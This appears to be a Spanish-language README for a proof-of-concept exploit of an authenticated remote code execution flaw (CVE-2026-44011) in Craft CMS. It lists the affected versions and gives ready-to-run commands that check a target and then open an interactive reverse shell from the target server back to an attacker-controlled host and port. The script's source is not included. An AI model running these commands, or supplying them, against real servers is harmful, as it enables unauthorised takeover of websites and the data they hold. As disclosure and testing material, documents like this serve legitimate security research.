
PoC de RCE autenticado en Craft CMS para CVE-2026-44011
Este script de Python adapta el ataque descrito en el aviso de seguridad de Craft CMS. Un usuario autenticado de Craft puede alcanzar una ruta de configuración de diseño de campos vulnerable y provocar que el servidor ejecute comandos.
Las versiones afectadas son Craft CMS >=4.0.0, <4.17.12 y >=5.0.0, <5.9.18.
El script requiere curl en ambos hosts. Utiliza Bash en el servidor. Python3 en el servidor también proporciona una PTY interactiva; sin él, el shell recurre a una conexión básica.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
Craft CMS acredita a @precicom-vincent-tl como el descubridor de CVE-2026-44011. Los detalles de la vulnerabilidad y el payload de ejemplo están publicados en el aviso de Craft CMS GHSA-qrgm-p9w5-rrfw. Este script adapta esa técnica publicada.